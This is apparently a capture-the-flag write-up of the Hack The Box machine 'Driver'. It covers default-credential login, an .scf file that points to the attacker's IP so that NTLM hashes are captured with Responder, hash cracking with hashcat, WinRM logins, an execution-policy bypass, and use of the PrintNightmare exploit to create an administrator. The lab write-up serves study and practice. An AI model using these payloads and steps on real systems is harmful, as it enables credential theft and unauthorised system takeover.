DriverJanuary 11, 2026 Created by Page Difficulty OS MrR3boot Hack The Box Easy Windows Enumeration I began with a full TCP port scan, followed by a service and version detection scan on the discovered open ports nmap -p- --open -vvv --min-rate 3000 -Pn -sS 10.10.11.106 -oG scan /opt/extractports scan nmap -p80,135,445,5985 -Pn -sCV 10.10.11.106 -oN ports Initial Access Accessing the web application prompted for credentials. After testing common default credentials, I successfully authenticated using: admin : admin Once logged in, I identified the domain driver.htb, which I added to /etc/hosts. While browsing the application, I discovered the page fw_up.php, which allows file uploads. After testing several file types without success, I noticed that the description indicated uploaded files were stored on a file share. NTLM Hash Capture via SCF File When write access to a Windows file share is available, a common technique is to upload an .scf file that references a remote resource. When the file is accessed, Windows attempts to retrieve the resource, leaking NTLM credentials. I created the following .scf file: [Shell] Command=2 IconFile=\\10.10.14.2\share\something.ico [Taskbar] Command=ToggleDesktop While running responder on my machine, I uploaded the file through the web application. Shortly after, I captured an NTLMv2 hash belonging to the user tony. Credential Cracking and Login I cracked the NTLMv2 hash using Hashcat: hashcat -m 5600 hash_NTLMv2 /usr/share/wordlists/rockyou.txt This revealed valid credentials: tony : liltony Using these credentials, I authenticated to the system via WinRM: evil-winrm -i 10.10.11.106 -u tony -p liltony This granted access to the system and allowed retrieval of the user flag. Privilege Escalation I reviewed the PowerShell command history for the user: cat C:\Users\tony\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt The history contained references related to printer configuration. This suggested possible exploitation of the Windows Print Spooler service After researching known vulnerabilities, I identified CVE-2021-1675 (PrintNightmare), which allows remote code execution via the Print Spooler service. I downloaded a public proof of concept. PoC Exploitation of PrintNightmare When attempting to import the PowerShell module, execution was blocked by the current execution policy. I verified and modified it: Get-ExecutionPolicy Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force; I then imported the exploit module: Import-Module .\cve-2021-1675.ps1 And executed the exploit: Invoke-Nightmare This created a new administrative user on the system. Using the newly created credentials, I authenticated as an administrator and obtained full access: evil-winrm -i 10.10.11.106 -u adm1n -p 2bkpr With administrative privileges, I accessed the Administrator directory and retrieved the final flag.